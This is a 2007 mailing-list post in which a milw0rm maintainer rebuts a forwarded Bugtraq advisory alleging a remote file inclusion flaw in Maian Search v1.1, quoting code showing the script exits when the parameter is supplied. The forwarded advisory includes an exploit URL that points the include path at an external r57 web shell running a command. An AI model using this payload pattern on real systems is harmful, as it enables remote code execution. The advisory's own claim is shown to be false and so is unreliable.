[VIM] false: Maian Search v1.1

str0ke str0ke at milw0rm.com
Sat Apr 14 17:53:23 UTC 2007


The script contains the below, lines 18/20.

if (isset($_GET['path_to_folder'])) { exit; }

$path_to_folder = dirname(__FILE__).'/';

/str0ke

---------- Forwarded message ----------
From: k4rtal at gmail.com <k4rtal at gmail.com>
Date: 14 Apr 2007 15:24:03 -0000
Subject: Maian Search v1.1
To: bugtraq at securityfocus.com


###########################################################################
#
# Script Name : Maian Search v1.1
#
# Download    : http://www.maianscriptworld.co.uk/freestuff_1975_search.html
#
# Coded by    : KaRTaL
#
# Contact      : k4rtal[at]gmail[dot]com
###########################################################################
#
# Include      : include($path_to_folder.'inc/db_connection.inc.php');
#
#
# Exploit       :
search.php?path_to_folder=http://sheladresin.com/r57.txt?cmd=id
#
#
###########################################################################
#
#
# Thankxz    : D3ngsz | Ekin0x | Doublekickx | Cr at zy_King | M3rhametsiz | MaNaR
#
#
#
#
#                                   Dengesiz Team
###########################################################################


More information about the VIM mailing list